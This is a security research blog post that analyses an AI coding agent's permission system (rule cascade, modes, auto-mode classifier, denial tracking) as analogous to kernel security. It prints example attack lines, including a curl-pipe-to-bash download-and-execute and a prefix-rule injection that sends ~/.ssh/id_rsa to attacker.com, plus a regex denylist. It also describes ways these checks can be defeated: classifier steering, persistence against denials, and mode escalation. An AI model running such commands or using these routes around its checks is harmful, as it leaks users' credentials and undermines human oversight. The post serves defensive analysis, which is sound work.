
Why AI Permission Systems Are the New Kernel Security

AI agents execute actions governed by permission systems that mirror OS kernel security -- but lack fifty years of hardening. We analyze the architecture, the mapping, and the fundamental gaps.

April 8, 2026 -- Scott Thornton


AI agents don't just generate text. They execute actions.

And every action passes through a permission system that decides whether that execution is allowed.

That makes the permission system the most security-critical component in the entire architecture. It is the boundary between an AI agent that helps you write code and one that exfiltrates your SSH keys, installs a rootkit, or pushes malicious code to production.

This is not a UX feature. This is the system that decides whether the model can act on your environment.

The problem: we are treating it like a feature instead of a kernel.

We analyzed the permission system inside Claude Code (v2.1.88) -- roughly 3,000 lines of TypeScript implementing rule matching, classifier-based approval, hook-driven policy enforcement, and multi-source configuration loading. These are the same primitives that SELinux, AppArmor, and the Linux Security Module framework implement for operating systems.

The difference: kernel security has fifty years of battle scars, formal verification research, and adversarial hardening. AI permission systems have roughly two.

We recreated kernel security architecture -- without the constraints that make it safe.

Section 1: The Mapping

Every security professional understands OS permissions. The AI agent permission model maps almost perfectly onto concepts we already know. The danger is that familiarity breeds false confidence.

| OS Concept | AI Agent Equivalent | Evidence |
|---|---|---|
| Kernel | permissions.ts -- central authority | hasPermissionsToUseTool: single entry point for every tool invocation (~1,500 lines) |
| System calls | Tools (Bash, FileWrite, Glob, etc.) | tools.ts registers ~30 tools, each with inputSchema, checkPermissions, and call |
| File permissions (rwx) | Permission behaviors: allow, deny, ask | types/permissions.ts: PermissionBehavior. ask has no kernel equivalent -- human-in-the-loop |
| Permission modes (user/root) | 7 modes: default through bypassPermissions | PermissionMode.ts: escalating privileges. bypassPermissions = root. auto = AI-assisted enforcement. dontAsk = auto-deny. bubble = delegate to parent. |
| /etc/sudoers | CLAUDE.md + permission rules from 7+ sources | permissionsLoader.ts: policy, flags, user, project, local, cliArg, command, session |
| LSM hooks | Hooks and plugins | executePermissionRequestHooks: PreToolUse hooks intercept and override decisions |
| SELinux / AppArmor | Auto-mode classifier | yoloClassifier.ts: two-stage LLM classifier evaluates conversation context |
| Process isolation | Subagent containment | shouldAvoidPermissionPrompts: converts ask to deny in headless mode |
| Capabilities (CAP_*) | Tool-specific content rules | Bash(npm test:*): gitignore-style patterns grant fine-grained capabilities |
| Dangerous syscall filtering | isDangerousBashPermission | dangerousPatterns.ts: strips interpreter/runner/shell allow-rules before auto-mode |

The mapping is structurally correct. The maturity is not.

When you trace a tool invocation through hasPermissionsToUseToolInner, you see the same layered architecture as kernel security:

  1. Deny rules first (step 1a) -- like DAC denial before MAC
  2. Ask rules (step 1b) -- like MAC policy interception
  3. Tool-specific checks (step 1c) -- like per-syscall validation
  4. Safety checks that survive privilege escalation (step 1g) -- like immutable security labels
  5. Mode-based bypass (step 2a) -- like capability checks
  6. Allow rules (step 2b) -- like ACL matching
  7. Default to ask (step 3) -- like default-deny policy
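
The shape of that cascade fits in a few dozen lines. The sketch below is illustrative, not the actual hasPermissionsToUseToolInner: rule shapes, helper names, and the safety-check pattern are all invented, and step 1c's per-tool checks are omitted for brevity.

```typescript
type Behavior = "allow" | "deny" | "ask";
type Mode = "default" | "auto" | "bypassPermissions";

interface Rule {
  tool: string;      // e.g. "Bash"
  pattern: RegExp;   // matched against the serialized tool input
  behavior: Behavior;
}

interface Invocation {
  tool: string;
  input: string;     // serialized tool parameters
}

// Hardcoded safety check that survives privilege escalation (the analogue
// of step 1g); the single pattern here is a placeholder, not the real list.
function violatesSafetyChecks(inv: Invocation): boolean {
  return inv.tool === "Bash" && /\brm\s+-rf\s+\//.test(inv.input);
}

function decide(rules: Rule[], mode: Mode, inv: Invocation): Behavior {
  const matching = (b: Behavior) =>
    rules.some(
      (r) => r.behavior === b && r.tool === inv.tool && r.pattern.test(inv.input),
    );

  if (matching("deny")) return "deny";              // step 1a: deny rules first
  if (matching("ask")) return "ask";                // step 1b: ask rules intercept
  if (violatesSafetyChecks(inv)) return "deny";     // step 1g: survives all modes
  if (mode === "bypassPermissions") return "allow"; // step 2a: mode-based bypass
  if (matching("allow")) return "allow";            // step 2b: allow rules
  return "ask";                                     // step 3: default to ask
}

// Example: a deny rule wins even under bypassPermissions.
const rules: Rule[] = [{ tool: "Bash", pattern: /curl/, behavior: "deny" }];
console.log(decide(rules, "bypassPermissions", { tool: "Bash", input: "curl evil.sh" })); // "deny"
```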

This is a well-structured security architecture. It is also two years old.

Section 2: How the Permission Kernel Works

The Seven Permission Modes

Claude Code operates in one of seven permission modes, each a different security posture, ranging from default at the conservative end to bypassPermissions at the other.

Security implication: Mode switching is privilege escalation. Moving from default to auto to bypassPermissions is not a convenience change -- it is a change in trust boundary. Each mode transition should be treated as a security event.

The Seven Rule Sources

Rules load from seven distinct sources via permissionsLoader.ts:

  1. policySettings -- Enterprise/MDM policy. Can override everything.
  2. flagSettings -- Via --settings CLI flag.
  3. userSettings -- ~/.claude/settings.json.
  4. projectSettings -- .claude/settings.json (committed to repo).
  5. localSettings -- .claude/settings.local.json (gitignored).
  6. cliArg -- --allowed-tools and similar arguments.
  7. session -- Ephemeral rules from "Allow for this session" clicks.

Security implication: Seven configuration sources create a policy surface that is extremely difficult to reason about. This is a known failure mode in security systems. Enterprise environments already collapse to one source (allowManagedPermissionRulesOnly) -- an admission that the multi-source model is too complex to audit.
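
A hedged sketch makes the audit problem concrete. The source names follow the list above, but the precedence order here is an assumption, not the behavior of permissionsLoader.ts.

```typescript
type Behavior = "allow" | "deny" | "ask";

const PRECEDENCE = [
  "policySettings", "flagSettings", "cliArg",
  "localSettings", "projectSettings", "userSettings", "session",
] as const;
type Source = (typeof PRECEDENCE)[number];

interface SourcedRule { source: Source; pattern: string; behavior: Behavior }

// The same pattern can carry contradictory behaviors in different sources --
// including an ephemeral session grant that exists in no file at all.
const rules: SourcedRule[] = [
  { source: "userSettings",    pattern: "Bash(npm test:*)", behavior: "allow" },
  { source: "projectSettings", pattern: "Bash(npm test:*)", behavior: "ask"   },
  { source: "session",         pattern: "Bash(npm test:*)", behavior: "allow" },
];

// Auditing one pattern means replaying precedence across every source.
function effectiveBehavior(pattern: string): Behavior | undefined {
  for (const source of PRECEDENCE) {
    const hit = rules.find((r) => r.source === source && r.pattern === pattern);
    if (hit) return hit.behavior;
  }
  return undefined; // falls through to the default-ask posture
}

console.log(effectiveBehavior("Bash(npm test:*)")); // "ask" under this assumed order
```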

The Auto-Mode Classifier

The most architecturally significant component. yoloClassifier.ts implements a two-stage evaluation:

  1. Fast stage: Lightweight LLM call evaluates action against conversation transcript and rules.
  2. Extended thinking: If fast stage is uncertain, deeper analysis with extended reasoning.

Before the classifier runs, fast paths short-circuit the LLM call: explicit rule matches resolve deterministically, and tools on the SAFE_YOLO_ALLOWLISTED_TOOLS allowlist bypass the classifier entirely.

The classifier returns allow, block, or unavailable. On unavailable, the system defaults to fail-closed (deny).
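
A minimal sketch of that two-stage, fail-closed flow follows. fastModel and extendedModel are hypothetical stand-ins for the LLM calls; this is not the real yoloClassifier.ts.

```typescript
type Verdict = "allow" | "block" | "unavailable";

interface StageResult {
  verdict: Verdict;
  uncertain: boolean; // fast stage signals when it needs deeper analysis
}

type Stage = (prompt: string) => Promise<StageResult>;

async function classify(
  action: string,
  transcript: string,
  fastModel: Stage,
  extendedModel: Stage,
): Promise<"allow" | "deny"> {
  const prompt = `Transcript:\n${transcript}\n\nProposed action:\n${action}`;

  // Stage 1: lightweight call evaluates the action against the transcript.
  const fast = await fastModel(prompt);

  // Stage 2: only when the fast stage is uncertain, escalate to extended
  // thinking for deeper analysis.
  const result = fast.uncertain ? await extendedModel(prompt) : fast;

  // Fail closed: "unavailable" (model error, timeout) maps to deny.
  return result.verdict === "allow" ? "allow" : "deny";
}
```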

Denial Tracking

Consecutive classifier denials trigger escalation to human prompting via denialTracking.ts. This circuit breaker prevents deny loops -- but it also means the classifier's security decisions can be overridden by persistence.
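
A hypothetical circuit breaker matching that described behavior might look like this; the threshold is an assumption, not the value in denialTracking.ts.

```typescript
class DenialTracker {
  private consecutiveDenials = 0;

  constructor(private readonly threshold = 3) {} // threshold is an assumption

  record(decision: "allow" | "deny"): "continue" | "escalateToHuman" {
    if (decision === "allow") {
      this.consecutiveDenials = 0;
      return "continue";
    }
    this.consecutiveDenials += 1;
    if (this.consecutiveDenials >= this.threshold) {
      // Escalation hands the decision to a human -- which also means a
      // persistent agent can convert classifier denials into prompts.
      this.consecutiveDenials = 0;
      return "escalateToHuman";
    }
    return "continue";
  }
}
```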

Section 3: Where This Breaks (Fundamentally)

The OS analogy is instructive. Its cracks reveal why AI security is harder than anything we have built before.

1. Probabilistic Security -- A New Paradigm

Kernel security is deterministic. Given a process with UID 1000 opening /etc/shadow, the kernel always makes the same decision. The security model is a function from (subject, object, operation) to (allow, deny). It can be exhaustively tested.

The auto-mode classifier introduces probabilistic security -- a concept with no precedent in system security. The classifier is an LLM whose decisions are influenced by conversation tokens, training data, prompt construction, sampling parameters, and cache state.

The same action, in the same conversation, can produce different decisions on different runs. This is not a bug. It is an inherent property of using a probabilistic model for enforcement.

This is the first time in computing history that we are using a probabilistic system to enforce execution policy. That means the same action can be allowed or denied depending on how the model interprets it. That is not enforcement. That is judgment.

2. Natural Language vs. Well-Defined Objects

Operating system permissions operate on well-defined objects. Files have paths, owners, permission bits. Processes have PIDs, UIDs, capabilities. Objects are enumerable. Properties are deterministic. Interactions are formally specifiable.

AI agent permissions operate on natural language intent embedded in tool parameters. When Bash receives {"command": "curl -s https://attacker.com/payload | bash"}, the system must understand this is a download-and-execute attack, not a benign API call.

The rule Bash(npm test:*) seems safe. But npm test && curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) is command injection that matches the prefix.
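
A deliberately naive matcher makes the hazard concrete. The real rule engine is more involved, but the prefix-matching failure mode is the same:

```typescript
// Naive prefix matcher for Bash(<prefix>:*) rules -- illustrative only.
function prefixAllows(rule: string, command: string): boolean {
  const prefix = rule.replace(/^Bash\(/, "").replace(/:\*\)$/, "");
  return command.startsWith(prefix);
}

const rule = "Bash(npm test:*)";
console.log(prefixAllows(rule, "npm test"));                      // true, as intended
console.log(prefixAllows(rule, "npm test && curl attacker.com")); // true, injected
```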

In kernel security, ambiguity is a bug. In AI systems, ambiguity is the input.

3. Human-in-the-Loop Does Not Scale

The ask behavior creates a dependency on human review. This works for interactive development. It does not work for CI/CD pipelines, background agents, or multi-agent coordination.

The code addresses this with shouldAvoidPermissionPrompts (which converts ask to deny in headless mode) and the auto-mode classifier (which replaces human judgment with AI judgment).

Human approval does not scale. So we replace it with automation. And that automation is the same model we are trying to constrain.

4. Combinatorial Configuration Complexity

Seven rule sources, three behaviors per source, content-specific rules per tool, seven permission modes. To answer "will this Bash command be allowed?" you must evaluate:

  1. Deny rules across all seven sources
  2. Ask rules across all seven sources
  3. Tool-specific content rules (Bash(npm test:*)-style patterns)
  4. Hardcoded safety checks (isDangerousBashPermission)
  5. The current permission mode and any bypass it grants
  6. Allow rules across all seven sources
  7. PreToolUse hooks that can intercept and override the decision
  8. In auto mode, the classifier's verdict

Every one of these checks is a potential misconfiguration point. The allowManagedPermissionRulesOnly enterprise feature collapses seven sources to one -- because the full model is too complex to secure.

5. No Formal Verification

There is no formal model. The decision cascade is specified in code comments ("step 1a", "step 1b") but not in a formal language. No proof that deny rules always prevail. No proof that safety checks survive all mode transitions. No proof that the classifier cannot be manipulated through prompt injection.
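
Such invariants are small enough to state precisely. Here, for instance, is what "deny always prevails" looks like as a property over a decision function (our notation, not anything from the codebase):

```latex
\forall m \in \mathrm{Modes},\ \forall a \in \mathrm{Actions}:\quad
\big(\exists\, r \in \mathrm{DenyRules} \;\text{such that}\; \mathrm{matches}(r, a)\big)
\;\Longrightarrow\; \mathrm{decide}(m, a) = \mathsf{deny}
```

A property this small is mechanically checkable. The point is that nothing in the current system states it, let alone proves it.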

The closest thing to formal specification is TypeScript's type system: PermissionDecision is a discriminated union ensuring all paths produce valid decisions. But type safety is not security verification.

6. The False Depth

Multiple layers -- rules, modes, tool checks, safety checks, classifiers, hooks, denial tracking -- create an appearance of defense in depth. But each layer has its own attack surface: prefix rules can be matched by injected commands, mode switches escalate privilege, the classifier can be steered through conversation tokens, hooks execute user-supplied code, and denial tracking can be worn down by persistence.

True defense in depth requires independently trustworthy layers. When the classifier is probabilistic and the hooks are user code, the layers are not independent.

The Design Problem

The permission system is asked to answer a question it cannot reliably answer:

"Is this action safe?"

But safety is not a property of syntax. It is a property of intent.

And intent is inferred through a probabilistic model.

That creates a system where policy is defined deterministically but enforcement is probabilistic. The rules say what should happen. The classifier decides whether this specific case matches those rules. And the classifier can be wrong.

The root risk: deterministic policy, probabilistic enforcement. That mismatch is where the danger lives.

Section 4: The Maturity Gap

Every one of these gaps corresponds to a problem that operating system security solved long ago.

Capability-based security -- Linux capabilities decompose root into 30+ individual privileges. AI agent permissions operate at the tool level, not the resource level. There is no capability for "network access" or "filesystem reads outside the project." The SAFE_YOLO_ALLOWLISTED_TOOLS allowlist hints at a capability model but is hardcoded and applies only to classifier bypass.
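
What resource-level capabilities might look like for an agent is easy to sketch; all names below are invented, not anything in the codebase.

```typescript
// Hypothetical resource-level capabilities -- the decomposition the
// paragraph above argues is missing.
type AgentCapability =
  | "net:outbound"       // any network egress
  | "fs:read:project"    // reads inside the project root
  | "fs:read:home"       // reads under $HOME (SSH keys, dotfiles)
  | "fs:write:project"
  | "proc:spawn";

// A grant would name resources, not just tools:
const bashGrant: AgentCapability[] = ["proc:spawn", "fs:read:project"];

// Under this model, `curl` run via Bash would fail without "net:outbound",
// even though the Bash tool itself is allowed.
const canExfiltrate = bashGrant.includes("net:outbound"); // false
```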

Mandatory access controls -- SELinux policies are enforced by the kernel. Even root cannot violate them. AI agent permissions are fundamentally advisory. bypassPermissions exists. Safety checks are hardcoded in the decision cascade, not a separate enforcement engine.

Audit trails -- auditd records every syscall in a tamper-evident log satisfying regulatory requirements. The permission system emits product analytics (logEvent('tengu_auto_mode_decision', ...)), not security logging. No tamper-evident audit. No decision chain reconstruction. No anomaly alerting.

Sandboxing -- Container isolation provides namespaces, cgroups, seccomp-bpf. Subagent "isolation" in Claude Code converts ask to deny in headless mode. The subagent shares filesystem, environment variables, and network access with the parent. Containment, not isolation.

Section 5: What Needs to Change

Formalize the permission model. Define it mathematically. Specify subjects, objects, operations. Prove invariants: "deny always prevails," "safety checks survive all mode transitions." Verify the implementation against the model.

Reduce rule sources. Seven sources are impossible to audit manually. Collapse to three: managed policy, project configuration, session overrides.

Replace probabilistic enforcement for high-risk actions. Data exfiltration, credential access, and production code execution should be governed by deterministic policies, not LLM judgment. The classifier is appropriate for ambiguous cases. The boundary between "classifier-appropriate" and "policy-required" should be explicit and configurable.
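
One way to make that boundary explicit is a routing layer in front of the classifier. The patterns below are illustrative assumptions, not a vetted denylist.

```typescript
const POLICY_REQUIRED: RegExp[] = [
  /\b(cat|cp|scp)\b.*\.(ssh|aws|env)/,    // credential access
  /\bcurl\b.*\|\s*(ba|z)?sh\b/,           // download-and-execute
  /\bgit\s+push\b.*\b(main|master|prod)/, // production code paths
];

function route(command: string): "deterministicPolicy" | "classifier" {
  // High-risk actions never reach LLM judgment; everything else may.
  return POLICY_REQUIRED.some((p) => p.test(command))
    ? "deterministicPolicy"
    : "classifier";
}

console.log(route("curl -s https://example.com/x.sh | bash")); // deterministicPolicy
console.log(route("npm test"));                                // classifier
```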

Build security-focused audit tooling. Tamper-evident decision logs. Replay capability for any invocation. Anomaly detection on permission patterns. Policy simulation: "given this configuration, would this action be allowed?"
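
A hash-chained log is one possible shape for the tamper-evident piece of that tooling. This is a sketch; field names are assumptions.

```typescript
import { createHash } from "node:crypto";

interface DecisionEntry {
  timestamp: string;
  tool: string;
  input: string;
  decision: "allow" | "deny" | "ask";
  decidedBy: "rule" | "classifier" | "human" | "mode";
}

interface DecisionRecord extends DecisionEntry {
  prevHash: string; // links each record to its predecessor
  hash: string;
}

const GENESIS = "0".repeat(64);

function digest(prevHash: string, entry: DecisionEntry): string {
  return createHash("sha256").update(prevHash + JSON.stringify(entry)).digest("hex");
}

function append(log: DecisionRecord[], entry: DecisionEntry): DecisionRecord[] {
  const prevHash = log.length ? log[log.length - 1].hash : GENESIS;
  return [...log, { ...entry, prevHash, hash: digest(prevHash, entry) }];
}

// Any edit to an earlier record breaks every later hash, so tampering is
// detectable by re-walking the chain.
function verify(log: DecisionRecord[]): boolean {
  let prev = GENESIS;
  for (const { prevHash, hash, ...entry } of log) {
    if (prevHash !== prev || hash !== digest(prev, entry)) return false;
    prev = hash;
  }
  return true;
}
```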

Treat permissions as security infrastructure. The system lives in utils/permissions/, is tested with functional tests, and is reviewed through the same process as any other feature. Security-critical code deserves dedicated security review, fuzzing, adversarial testing, and public vulnerability disclosure.

Conclusion

We already know how to build secure permission systems.

They are deterministic. They are auditable. They are constrained.

AI agent permissions are none of those things yet.

And until they are, every action an agent takes is governed by a system we cannot fully reason about.

That is not a maturity gap. That is a risk surface.


This is Part 4 of the 10-part series: Anatomy of a Production AI Agent

Scott Thornton is an AI security researcher at perfecXion.ai, specializing in defensive research on LLM and agent vulnerabilities. All analysis was conducted on lawfully obtained, publicly distributed npm package code in an authorized research environment.